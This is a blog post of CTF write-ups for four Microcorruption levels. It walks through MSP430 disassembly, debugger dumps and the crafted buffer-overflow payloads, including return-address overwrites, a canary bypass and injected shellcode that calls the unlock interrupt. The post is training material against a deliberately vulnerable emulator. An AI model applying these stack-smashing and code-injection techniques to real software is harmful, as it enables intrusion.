<!DOCTYPE html>
<html lang="en" prefix="og: http://ogp.me/ns#">
<head>
  <meta charset="UTF-8" />
  <title>Writeups of some Microcorruption CTF challenges | maxmcl.bitbucket.io</title>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,400i,600,600i%7CSource+Code+Pro:400,400i,600" />
  <link rel="stylesheet" href="https://maxmcl.bitbucket.io/static/m-dark.compiled.css" />
  <link rel="icon" href="https://maxmcl.bitbucket.io/static/favicon.ico" type="image/x-ico" />
  <link rel="canonical" href="https://maxmcl.bitbucket.io/blog/microcorruption/" />
  <link href="https://maxmcl.bitbucket.io/feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="maxmcl.bitbucket.io" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="theme-color" content="#22272e" />
  <meta property="og:site_name" content="maxmcl.bitbucket.io" />
  <meta property="og:title" content="Writeups of some Microcorruption CTF challenges" />
  <meta name="twitter:title" content="Writeups of some Microcorruption CTF challenges" />
  <meta property="og:url" content="https://maxmcl.bitbucket.io/blog/microcorruption/" />
  <meta property="og:description" content="Writeups of the challenges" />
  <meta name="twitter:description" content="Writeups of the challenges" />
  <meta property="og:image" content="https://maxmcl.bitbucket.io/static/map.png" />
  <meta name="twitter:image" content="https://maxmcl.bitbucket.io/static/map.png" />
  <meta name="twitter:card" content="summary_large_image" />
  <meta property="og:type" content="article" />
</head>
<body>
<header><nav id="navigation" class="m-navbar-cover">
  <div class="m-container">
    <div class="m-row">
      <a href="https://maxmcl.bitbucket.io/" id="m-navbar-brand" class="m-col-t-9 m-col-m-none m-left-m"><img src="https://maxmcl.bitbucket.io/static/favicon.ico" alt="" />maxmcl.bitbucket.io</a>
      <a id="m-navbar-show" href="#navigation" title="Show navigation" class="m-col-t-3 m-hide-m m-text-right"></a>
      <a id="m-navbar-hide" href="#" title="Hide navigation" class="m-col-t-3 m-hide-m m-text-right"></a>
      <div id="m-navbar-collapse" class="m-col-t-12 m-show-m m-col-m-none m-right-m">
        <div class="m-row">
          <ol class="m-col-t-12 m-col-m-none">
            <li><a href="https://maxmcl.bitbucket.io/">Blog</a></li>
            <li><a href="https://maxmcl.bitbucket.io/contact/">Contact</a></li>
          </ol>
        </div>
      </div>
    </div>
  </div>
</nav></header>
<main>
  <article id="m-jumbo">
    <header>
      <div id="m-jumbo-image" style="background-image: url('https://maxmcl.bitbucket.io/static/map.png');">
        <div id="m-jumbo-cover">
          <div class="m-container">
            <div class="m-row">
              <div class="m-col-t-6 m-col-s-5 m-push-s-1 m-text-left">Fri 08 April 2022</div>
              <div class="m-col-t-6 m-col-s-5 m-push-s-1 m-text-right"><a href="https://maxmcl.bitbucket.io/author/maxmcl/">maxmcl</a></div>
            </div>
            <div class="m-row">
              <div class="m-col-t-12 m-col-s-10 m-push-s-1 m-col-m-8 m-push-m-2">
                <h1><a href="https://maxmcl.bitbucket.io/blog/microcorruption/" rel="bookmark" title="Permalink to Writeups of some Microcorruption CTF challenges">Writeups of some Microcorruption CTF challenges</a></h1>
              </div>
            </div>
          </div>
        </div>
      </div>
    </header>
    <div class="m-container m-container-inflatable">
      <div class="m-row">
        <div class="m-col-m-10 m-push-m-1 m-nopady">
<!-- content -->
<p>Writeups of some of the <a href="https://microcorruption.com/">Microcorruption CTF challenges</a>.</p>
<aside class="contents" id="contents">
<h3>Contents</h3>
<ul>
<li><a href="#johannesburg" id="toc-entry-1">Johannesburg</a></li>
<li><a href="#reykjavik" id="toc-entry-2">Reykjavik</a></li>
<li><a href="#whitehorse" id="toc-entry-3">Whitehorse</a></li>
<li><a href="#montevideo" id="toc-entry-4">Montevideo</a></li>
</ul>
</aside>
<p></p>
<section id="johannesburg">
<h2><a href="#johannesburg">Johannesburg</a></h2>
<p>Fun fact, this is a city in South Africa. Would never have guessed given the name.</p>
<p>This challenge closely ressembles <cite>Cusco</cite>, but with an extra twist.</p>
<p>Like in the previous challenges, we have a <cite>main</cite> that simply calls the <cite>login</cite> function:</p>
<pre class="m-code">452c &lt;login&gt;
452c:  3150 eeff      add     #0xffee, sp
4530:  f140 e600 1100 mov.b   #0xe6, 0x11(sp)
4536:  3f40 7c44      mov     #0x447c &quot;Enter the password to continue.&quot;, r15
453a:  b012 f845      call    #0x45f8 &lt;puts&gt;
453e:  3f40 9c44      mov     #0x449c &quot;Remember: passwords are between 8 and 16 characters.&quot;, r15
4542:  b012 f845      call    #0x45f8 &lt;puts&gt;
4546:  3e40 3f00      mov     #0x3f, r14
454a:  3f40 0024      mov     #0x2400, r15
454e:  b012 e845      call    #0x45e8 &lt;getsn&gt;
4552:  3e40 0024      mov     #0x2400, r14
4556:  0f41           mov     sp, r15
4558:  b012 2446      call    #0x4624 &lt;strcpy&gt;
455c:  0f41           mov     sp, r15
455e:  b012 5244      call    #0x4452 &lt;test_password_valid&gt;
4562:  0f93           tst     r15
4564:  0524           jz      #0x4570 &lt;login+0x44&gt;
4566:  b012 4644      call    #0x4446 &lt;unlock_door&gt;
456a:  3f40 d144      mov     #0x44d1 &quot;Access granted.&quot;, r15
456e:  023c           jmp     #0x4574 &lt;login+0x48&gt;
4570:  3f40 e144      mov     #0x44e1 &quot;That password is not correct.&quot;, r15
4574:  b012 f845      call    #0x45f8 &lt;puts&gt;
4578:  f190 e600 1100 cmp.b   #0xe6, 0x11(sp)
457e:  0624           jeq     #0x458c &lt;login+0x60&gt;
4580:  3f40 ff44      mov     #0x44ff &quot;Invalid Password Length: password too long.&quot;, r15
4584:  b012 f845      call    #0x45f8 &lt;puts&gt;
4588:  3040 3c44      br      #0x443c &lt;__stop_progExec__&gt;
458c:  3150 1200      add     #0x12, sp
4590:  3041           ret</pre>
<p>The new additions are</p>
<ul>
<li>a <cite>strcpy</cite> call on <cite>0x4558</cite></li>
<li>an extra <cite>br</cite> instruction on <cite>0x4588</cite> that directly terminates the program</li>
<li>a <cite>cmp.b</cite> instruction that compares byte 11 from the stack pointer to <cite>0xe6</cite></li>
</ul>
<p>The winning condition still seems to be to make <cite>r15</cite> non zero after the call to
<cite>test_password_valid</cite> returns. That being said, we still do not have access to
the code that validates the password (provided by an hardware <cite>interrupt</cite> call),
so it seem likely we must <cite>smash the stack</cite> like in <cite>Cusco</cite>.</p>
<p>The buffer overflow vulnerability is still present, as 63 bytes (as opposed to
the supposedly 16 bytes length maximum mentioned in the challenge) are allocated in
register 14 on <cite>0x4546</cite> as input argument to the <cite>getsn</cite> function that loads our
input.</p>
<p>Using Python, we can craft a simple <cite>pattern</cite> payload to get a better sense of
what we might be able to overflow:</p>
<pre class="m-code"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">(</span><span class="s2">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="sa">f</span><span class="s2">&quot;</span><span class="si">{</span><span class="n">x</span><span class="si">}{</span><span class="s1">&#39;Z&#39;</span><span class="o">*</span><span class="mi">3</span><span class="si">}</span><span class="s2">&quot;</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_lowercase</span><span class="p">]))</span>
<span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;aZZZbZZZcZZZdZZZeZZZfZZZgZZZhZZZiZZZjZZZkZZZlZZZmZZZnZZZoZZZpZZZqZZZrZZZsZZZtZZZuZZZvZZZwZZZxZZZyZZZzZZZ&#39;</span></pre>
<p>Setting a breakpoint on <cite>0x4562</cite>, we can check to see what happens with <cite>r15</cite> after
we provided this input. Unfortunately it is 0, which means the jump on <cite>0x4564</cite>
will take us to <cite>0x4570</cite>, where we can notice the first interesting thing:</p>
<pre class="m-code">&gt; r sp+11
   43fd:   5a5a 5a66 5a5a 5a67  ZZZfZZZg
   4405:   5a5a 5a68 5a5a 5a69  ZZZhZZZi
   440d:   5a5a 5a6a 5a5a 5a6b  ZZZjZZZk
   4415:   5a5a 5a6c 5a5a 5a6d  ZZZlZZZm</pre>
<p>Reading the 11th byte from the stack pointer, we are actually within our payload,
which overflowed the memory allocated for the frame on the stack. This means
that we can now replace the the 17th offset from our payload (1 byte after <cite>e</cite>)
by <cite>0xe6</cite> to pass the check on <cite>0x4578</cite>. This actually lets us jump to
<cite>0x458c</cite>, where we read one byte after the location we just read, meaning we
also have control over it. We can finally put the return address to the function
that unlocks the lock right at that offset to complete the challenge:</p>
<pre class="m-code">4566:  b012 4644      call    #0x4446 &lt;unlock_door&gt;</pre>
<p>which is <cite>0x4446</cite>. Minding the endianness, we can craft the following payload:</p>
<pre class="m-code"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">(</span><span class="nb">bytearray</span><span class="p">(</span><span class="sa">b</span><span class="s2">&quot;A&quot;</span> <span class="o">*</span> <span class="mi">17</span> <span class="o">+</span> <span class="nb">bytearray</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s2">&quot;e64446&quot;</span><span class="p">))</span><span class="o">.</span><span class="n">hex</span><span class="p">())</span>
<span class="o">&gt;&gt;&gt;</span> <span class="mf">4141414141414141414141414141414141e64446</span></pre>
<p>And we see the confirmation of success</p>
<pre>Our operatives are entering the building.
Go back to the world map to see what new warehouses they find.
The CPU completed in 6311 cycles.</pre>
</section>
<section id="reykjavik">
<h2><a href="#reykjavik">Reykjavik</a></h2>
<p>At a glance, this challenge is pretty different from the previous ones.
Namely, most of the gathering the user input and validating it logic seems to
happen in a memory location which doesn't belong to a function, essentially
hiding it from us.</p>
<pre class="m-code">4438 &lt;main&gt;
4438:  3e40 2045      mov     #0x4520, r14
443c:  0f4e           mov     r14, r15
443e:  3e40 f800      mov     #0xf8, r14
4442:  3f40 0024      mov     #0x2400, r15
4446:  b012 8644      call    #0x4486 &lt;enc&gt;
444a:  b012 0024      call    #0x2400
444e:  0f43           clr     r15</pre>
<p>Setting a breakpoint on the <cite>call #0x2400</cite> instruction, we can see that the
&quot;hidden&quot; instructions there:</p>
<pre class="m-code">&gt; r 2400
   2400:   0b12 0412 0441 2452  .....A$R
   2408:   3150 e0ff 3b40 2045  1P..;@ E
   2410:   073c 1b53 8f11 0f12  .&lt;.S....
   2418:   0312 b012 6424 2152  ....d$!R</pre>
<p>Hitting <cite>continue</cite>, we can resume right after having provided an input. Looking
at the stack pointer, we can see where our input is stored in memory (I passed
<cite>abcdefghi</cite>):</p>
<pre class="m-code">&gt; r sp
   43da:   6162 6364 6566 6768  abcdefgh
   43e2:   6900 0000 0000 0000  i.......
   43ea:   0000 0000 0000 0000  ........
   43f2:   0000 0000 0000 0000  ........</pre>
<p>Inspecting the registers, we can notice that <cite>r4</cite> is at <cite>0x43fe</cite>, which is
suspiciously close to the input buffer and might be vulnerable to an overflow.
However we do not know if that's the case since those instructions are hidden
in the aforementioned memory location starting at <cite>0x2400</cite>.</p>
<p>Stepping some more, we can observe the instruction pointer to see what happens
with our input:</p>
<pre class="m-code">b490 428f dcff
cmp #0x8f42, -0x24(r4)</pre>
<p><cite>r4-0x24</cite> is rigth at the beginning of our input buffer:</p>
<pre class="m-code">&gt; r r4-24
   43da:   6162 6364 6566 6768  abcdefgh
   43e2:   6900 0000 0000 0000  i.......
   43ea:   0000 0000 0000 0000  ........
   43f2:   0000 0000 0000 0000  ........</pre>
<p>We got our first nugget of information and obviously we would fail the <cite>cmp</cite>
this time. Let's see what happens.</p>
<pre class="m-code">0520
jnz $+0xc</pre>
<p>Here <cite>$</cite> means the current instruction pointer, so we'd jump to <cite>0x245a</cite>, still
in the hidden intructions. Next instruction increments the stack pointer by 20</p>
<pre class="m-code">&gt; r sp+20
   43fa:   0000 0000 4e44 3140  ....ND1@
   4402:   0044 1542 5c01 75f3  .D.B\.u.
   440a:   35d0 085a 3f40 7c00  5..Z?@|.
   4412:   0f93 0724 8245 5c01  ...$.E\.</pre>
<p>This instruction is also pretty close to our input buffer for that stack frame,
which starts at <cite>0x43da</cite>. Finally the program terminates after we execute a few
more steps.</p>
<p>So far we've learned two things:
1. we can access a whole different branch by passing the <cite>cmp</cite> instruction
2. we might be able to overflow the buffer to reach <cite>0x43fa</cite></p>
<p>However we still don't know how to win the challenge.</p>
<p>Let's first rerun the program to test hypothesis #2. Reusing the same <cite>pattern</cite>
as before</p>
<pre class="m-code"><span class="s2">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="sa">f</span><span class="s2">&quot;</span><span class="si">{</span><span class="n">x</span><span class="si">}{</span><span class="s1">&#39;Z&#39;</span><span class="o">*</span><span class="mi">3</span><span class="si">}</span><span class="s2">&quot;</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_lowercase</span><span class="p">])</span></pre>
<p>which will fail the <cite>cmp</cite> instruction as well. Reading the memory from the
stack pointer:</p>
<pre class="m-code">&gt; r sp 50
   43d0:   0100 4424 0200 da43  ..D$...C
   43d8:   1f00 615a 5a5a 625a  ..aZZZbZ
   43e0:   5a5a 635a 5a5a 645a  ZZcZZZdZ
   43e8:   5a5a 655a 5a5a 665a  ZZeZZZfZ
   43f0:   5a5a 675a 5a5a 685a  ZZgZZZhZ
   43f8:   5a00 0000 0000 4e44  Z.....ND
   4400:   3140 0044 1542 5c01  1@.D.B\.
   4408:   75f3 35d0 085a 3f40  u.5..Z?@
   4410:   7c00 0f93 0724 8245  |....$.E
   4418:   5c01 2f83 9f4f 3845  \./..O8E
   4420:   0024 f923 3f40 0001  .$.#?@.</pre>
<p>We see that our buffer ends short of <cite>0x43fa</cite>. We can also infer the length of
the input buffer, which is 2 bytes after <cite>h</cite>, so 30. Lets resend our input
but with <cite>0x8f42</cite> (minding the endianness) at the beginning instead,
where <cite>x</cite> is our previous payload</p>
<pre class="m-code"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">((</span><span class="nb">bytearray</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s2">&quot;428f&quot;</span><span class="p">)</span> <span class="o">+</span> <span class="n">x</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hex</span><span class="p">())</span>
<span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;428f615a5a5a625a5a5a635a5a5a645a5a5a655a5a5a665a5a5a675a5a5a685a5a5a695a5a5a6a5a5a5a6b5a5a5a6c5a5a5a6d5a5a5a6e5a5a5a6f5a5a5a705a5a5a715a5a5a725a5a5a735a5a5a745a5a5a755a5a5a765a5a5a775a5a5a785a5a5a795a5a5a7a5a5a5a&#39;</span></pre>
<p>We now access the other hidden branch... and it just unlocks it</p>
<pre>Our operatives are entering the building.
Go back to the world map to see what new warehouses they find.
The CPU completed in 22714 cycles.</pre>
<p>Again, it seems like not being bogged down in the details (e.g. the <cite>enc</cite> function)
pays off.</p>
</section>
<section id="whitehorse">
<h2><a href="#whitehorse">Whitehorse</a></h2>
<p>This level closely resembles Johannesburg, but with the notable difference of
containing no <cite>unlock_door</cite> function. Again, <cite>main</cite> calls a single <cite>login</cite> function
where we see a new <cite>conditional_unlock_door</cite> function</p>
<pre class="m-code">44f4 &lt;login&gt;
44f4:  3150 f0ff      add     #0xfff0, sp
44f8:  3f40 7044      mov     #0x4470 &quot;Enter the password to continue.&quot;, r15
44fc:  b012 9645      call    #0x4596 &lt;puts&gt;
4500:  3f40 9044      mov     #0x4490 &quot;Remember: passwords are between 8 and 16 characters.&quot;, r15
4504:  b012 9645      call    #0x4596 &lt;puts&gt;
4508:  3e40 3000      mov     #0x30, r14
450c:  0f41           mov     sp, r15
450e:  b012 8645      call    #0x4586 &lt;getsn&gt;
4512:  0f41           mov     sp, r15
4514:  b012 4644      call    #0x4446 &lt;conditional_unlock_door&gt;
4518:  0f93           tst     r15
451a:  0324           jz      #0x4522 &lt;login+0x2e&gt;
451c:  3f40 c544      mov     #0x44c5 &quot;Access granted.&quot;, r15
4520:  023c           jmp     #0x4526 &lt;login+0x32&gt;
4522:  3f40 d544      mov     #0x44d5 &quot;That password is not correct.&quot;, r15
4526:  b012 9645      call    #0x4596 &lt;puts&gt;
452a:  3150 1000      add     #0x10, sp
452e:  3041           ret</pre>
<p>Right away we notice that we have a 30 bytes input buffer from <cite>0x4508</cite> and that
the same exploit from the jump in the stack pointer right before the end of
<cite>login</cite> might be usable. Sending a <cite>pattern</cite> payload confirms it (from <cite>0x452a</cite>):</p>
<pre class="m-code">&gt; r sp+10
   40b2:   655a 5a5a 665a 5a5a  eZZZfZZZ
   40ba:   675a 5a5a 685a 5a5a  gZZZhZZZ
   40c2:   695a 5a5a 6a5a 5a5a  iZZZjZZZ
   40ca:   6b5a 5a5a 6c5a 5a5a  kZZZlZZZ</pre>
<p>So it's clear we can manipulate the instruction pointer when <cite>login</cite> returns,
but now the question becomes to where? Previously we could jump to an existing
memory location which would unlock the door, but now this is unavailable.</p>
<p>However, we still have access to the <cite>INT</cite> function, which unlocks the door if
provided the argument <cite>0x7f</cite> as we could see in previous challenges.</p>
<p>It seems like we now have to make the instruction pointer point to some CPU
instructions we crafted ourselves rather than a simple memory location!</p>
<p>Looking at instructions from <cite>conditional_unlock_door</cite>, we can gather the pieces
we need:</p>
<pre class="m-code">445c:  3012 7e00      push    #0x7e
4460:  b012 3245      call    #0x4532 &lt;INT&gt;</pre>
<p>we can see that the <cite>opcode</cite> for <cite>call</cite> is <cite>b012</cite> and that the opcode for <cite>push</cite>.
is <cite>3012</cite>.</p>
<p>To summarize, the plan is to</p>
<ol>
<li>Store a memory location at index 16 of the input buffer (<cite>eZZZ</cite>)</li>
<li>That memory location should point to somewhere in the input buffer itself where
we stored CPU instructions to load <cite>0x7f</cite> on the stack and then call <cite>INT</cite></li>
</ol>
<p>So given the memory location must be at <cite>0x40b2</cite>, we can point right after those
2 bytes to <cite>0x40b4</cite> (minding the endianness) and insert <cite>3012 7f00 b012 3245</cite>,
which would be &quot;call <cite>INT</cite> with <cite>0x7f</cite>.</p>
<pre class="m-code"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">((</span><span class="sa">b</span><span class="s2">&quot;A&quot;</span><span class="o">*</span><span class="mi">16</span> <span class="o">+</span> <span class="nb">bytearray</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s2">&quot;b440 3012 7f00 b012 3245&quot;</span><span class="p">))</span><span class="o">.</span><span class="n">hex</span><span class="p">())</span>
<span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;41414141414141414141414141414141b44030127f00b0123245&#39;</span>

<span class="n">Re</span><span class="o">-</span><span class="n">running</span> <span class="k">with</span> <span class="n">this</span> <span class="n">payload</span> <span class="ow">and</span> <span class="n">stepping</span> <span class="n">when</span> <span class="n">the</span> <span class="n">function</span> <span class="n">returns</span><span class="p">,</span> <span class="n">we</span> <span class="n">can</span>
<span class="n">see</span> <span class="n">that</span> <span class="n">it</span> <span class="n">seems</span> <span class="n">to</span> <span class="n">work</span><span class="err">!</span></pre>
<pre class="m-code">&gt; r pc
   40b4:   3012 7f00 b012 3245  0....2E
   40bc:   0000 0000 0000 0000  ........
   40c4:   0000 0000 0000 0000  ........
   40cc:   0000 0000 0000 0000  ........</pre>
<p>and we can see the CPU processing the instruction we injected</p>
<pre class="m-code">3012 7f00
push #0x7f</pre>
<p>Stepping once more, we can see the instruction worked</p>
<pre class="m-code">&gt; r sp
   40b2:   7f00 3012 7f00 b012  .0....
   40ba:   3245 0000 0000 0000  2E......
   40c2:   0000 0000 0000 0000  ........
   40ca:   0000 0000 0000 0000  ........</pre>
<p>and we can see the stack grew over the <cite>0x40b4</cite> location we injected in our buffer.</p>
<p>Now, moment of truth:</p>
<pre>Our operatives are entering the building.
Go back to the world map to see what new warehouses they find.
The CPU completed in 5178 cycles.</pre>
<p>Let's GO!</p>
</section>
<section id="montevideo">
<h2><a href="#montevideo">Montevideo</a></h2>
<p>That stuff is fun.</p>
<p>Again, the challenge has a similar look. Right off the bat, I noticed the addition
of the <cite>strcpy</cite> call into the <cite>login</cite> function:</p>
<pre class="m-code">451a:  b012 dc45      call    #0x45dc &lt;strcpy&gt;</pre>
<p>This already got me thinking, maybe we can exploit the null delimiter in this
challenge. The rest of the <cite>login</cite> function seemed mostly the same as <cite>Whitehorse</cite>,
so I decided to just try the solution from that problem (after tweaking the addresses).</p>
<p>And there we have it, our buffer gets truncated after the null bytes (<cite>0x00</cite>).</p>
<p>We can make a quick validation by sending a dummy <cite>0x41411000104141</cite>. I tried
passing non-ASCII bytes (<cite>0x10</cite> s) just in case more involved filtering was going on.</p>
<p>Rigth after the prompt, we can read <cite>0x2400</cite> and see our input perfectly:</p>
<pre class="m-code">&gt; r 2400
   2400:   4141 1000 1041 4100  AA...AA.
   2408:   0000 0000 0000 0000  ........
   2410:   0000 0000 0000 0000  ........
   2418:   0000 0000 0000 0000  ........</pre>
<p>Stopping right before the <cite>sp+10</cite> instruction at the end of <cite>login</cite>, we can
see that not only is our input truncated by the copy, our initial buffer is
also flushed (presumably by the newly added <cite>memset</cite>).</p>
<pre class="m-code">&gt; r 2400
   2400:   0000 0000 0000 0000  ........
   2408:   0000 0000 0000 0000  ........
   2410:   0000 0000 0000 0000  ........
   2418:   0000 0000 0000 0000  ........

&gt; r sp
   43ee:   4141 1000 0000 0000  AA......
   43f6:   0000 0000 0000 0000  ........
   43fe:   3c44 3140 0044 1542  &lt;D1@.D.B
   4406:   5c01 75f3 35d0 085a  \.u.5..Z</pre>
<p>After spending a couple minutes thinking of ways to pass our unlocking payload
(which will invariably contain a null byte since we must pass <cite>0x007f</cite> to the
<cite>INT</cite> function), I couldn't figure out a way. Maybe it's possible by somehow
having it at the end, but I couldn't see how we could chain the instructions we
need for the door to unlock.</p>
<p>So I had another idea, what if instead we reuse the same instruction injection
technique, but to call <cite>getsn</cite>, the function that prompts us to pass the initial buffer.</p>
<p>That way, we could pass null bytes while also preventing <cite>memset</cite> from being called.</p>
<p>Being extra careful not passing any null bytes to our initial buffer (requires
padding, changing the buffer size and address of the subsequent <cite>getsn</cite> call),
we get something that looks like this:</p>
<pre class="m-code"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">((</span><span class="sa">b</span><span class="s2">&quot;A&quot;</span><span class="o">*</span><span class="mi">16</span> <span class="o">+</span> <span class="nb">bytearray</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s2">&quot;0244 4141 3e40 1010 3f40 2024 b012 a045 b012 2024&quot;</span><span class="p">))</span><span class="o">.</span><span class="n">hex</span><span class="p">())</span>
<span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;41414141414141414141414141414141024441413e4010103f402024b012a045b0122024&#39;</span></pre>
<p>where <cite>0x4402</cite> is the injected <cite>pc</cite> address, the 3 following instructions where
ripped off from <cite>login</cite> to call <cite>getsn</cite> (see below) and finally we set a call
to the next buffer we'll pass.</p>
<pre class="m-code">4508:  3e40 3000      mov     #0x30, r14
450c:  3f40 0024      mov     #0x2400, r15
4510:  b012 a045      call    #0x45a0 &lt;getsn&gt;</pre>
<p>Reusing our unlock payload but with a tweaked address:</p>
<pre class="m-code"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">(</span><span class="nb">bytearray</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s2">&quot;3012 7f00 b012 4c45&quot;</span><span class="p">)</span><span class="o">.</span><span class="n">hex</span><span class="p">())</span>
<span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;30127f00b0124c45&#39;</span></pre>
<p>It works!</p>
<pre>Our operatives are entering the building.
Go back to the world map to see what new warehouses they find.
The CPU completed in 6924 cycles.</pre>
<p>I honestly doubt this was the intended way to solve the challenge, but it seems
to work just fine.</p>
<p><strong>NOTE:</strong> I was right; a much simpler solution is to just use some arithmetic
operations to compute <cite>0x7f</cite> and store it on a register such that no null bytes
are involved.</p>
<p>For instance, <cite>0x0101</cite> is the smallest number we can represent in hex without
null bytes (also part of my previous solution). We can add <cite>0xf7</cite> to it which
gives <cite>0x0180</cite>. Now we can't use the <cite>add</cite> instruction since we'd need to pass
<cite>0xf7</cite>, but we can use <cite>sub</cite>:</p>
<pre class="m-code">mov #0x0180, r15
sub #0x0101, r15
push r15</pre>
<p>This is a much more elegant solution!</p>
</section>
<!-- /content -->
        </div>
      </div>
    </div>
    <footer class="m-container">
      <div class="m-row">
        <div class="m-col-m-10 m-push-m-1 m-nopadb">
          <p>Tags: <a href="https://maxmcl.bitbucket.io/tag/ctf/">CTF</a>, <a href="https://maxmcl.bitbucket.io/tag/assembly/">assembly</a>, <a href="https://maxmcl.bitbucket.io/tag/low-level/">low level</a>.</p>
        </div>
      </div>
    </footer>
  </article>
</main>
</body>
</html>